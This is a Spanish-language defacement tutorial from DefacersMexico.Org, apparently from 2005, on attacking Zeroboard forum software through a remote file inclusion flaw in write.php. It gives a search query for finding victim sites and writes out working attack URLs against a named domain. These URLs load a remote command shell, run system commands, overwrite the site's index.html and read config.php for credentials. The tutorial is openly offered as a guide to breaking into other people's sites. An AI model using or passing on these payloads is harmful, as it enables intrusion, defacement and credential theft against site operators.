Professional Documents
Culture Documents
*/ Http://Www.DefacersMexico.Org */
Defacing en Zeroboard
############################################################################
sh-2.05b$ ./ Escrito por Status-x [ phr4xz@gmail.com ] - Mexico
############################################################################
****************************************************************************
[ Contenido ]
[ 1 ] .- Introduccion.............................................. Status-x
[ 2 ] .- Que es Zeroboard.......................................... Status-x
[ 3 ] .- Buscando Victimas......................................... Status-x
[ 4 ] .- Explorando el Bug......................................... Status-x
[ 5 ] .- Tips De Deface............................................ Status-x
[ 7 ] .- Despedida................................................. Status-x
****************************************************************************
############################################################################
sh-2.05b$ ./ Introduccion
############################################################################
Que onda chavos, pues al parecer veo que los tutoriales estan siendo distri
buidos rapidamente, claro no faltara el pendejo que le cambie los datos :)
pero en fin esta vez trataremos del deface con rfi en Zeroboard un sistema
de foros bastante conocido en Korea :), gracias a todos los que me apoyan
dando a conocer la web publicando los tutoriales de verdad muchas gracias
es por eso que esta vez les comparto esta tecnica :) comenzemos...
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
sh-2.05b$ ./ Que es Zeroboard
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
############################################################################
sh-2.05b$ ./ Buscando Victimas
############################################################################
Bien dado que el sistema es usado solo en Korea podriamos buscar sitios
de la siguiente manera:
****************************
allinurl: /zboard/zboard.php
****************************
Con lo cual la url para buscar sitios seria de la siguiente manera:
**************************************************************************
http://www.google.co.kr/search?hl=ko&q=allinurl%3A+zboard%2Fzboard.php&lr=
**************************************************************************
Listo tenemos ya algunas webs con las cuales podremos practicar :)
############################################################################
sh-2.05b$ ./ Explorando el BUG
############################################################################
Bien el bug se encuentra en el archivo write.php en las ultimas lineas jeje
primero tenemos unas lineas que no se entienden y despues la variable $dir
que es la causante del fallo :)
***********************************
include $dir."/write.php";
***********************************
Por lo que nuestro deface lo haremos de la siguiente manera:
http://juotte.com/bbs/include
/write.php?dir=http://mx.geocities.com/razorkron/cmd.txt?&cmd=uname -a;pwd;id
http://juotte.com/bbs/include
/write.php?dir=http://mx.geocities.com/razorkron/cmd.txt?&cmd=cd /home/juotte/ww
w;echo Status-x was Here >index.html
http://localhost.com/zboard/include/
write.php?dir=http://mx.geocities.com/razorkron/cmd.txt?&cmd=cd%20..;cat%20confi
g.php
############################################################################
sh-2.05b$ ./ Despedida
############################################################################
Un tutorial mas para la web DefacersMexico.Org, al parecer ya son varias las
webs que estan publicando mis tutoriales:
Tbc-Labz.Org
MbyteSecurity.Org
NeoSecurityTeam.Net
A ellos gracias por publicar mis tutoriales y por favor recomienden el sitio ;)
y un saludo para mi novia Mariana que espero algun dia entienda que yo la quiero
muchisimo aunque algunas veces no sepa como demostrarselo :(
Saludos ;)
############################################################################
sh-2.05b$ ./ exit
Copyright 2005 Defacers Mexico - No modificar sin permiso de su autor
Si publicas este texto en tu sitio por favor no lo modifiques ;)
############################################################################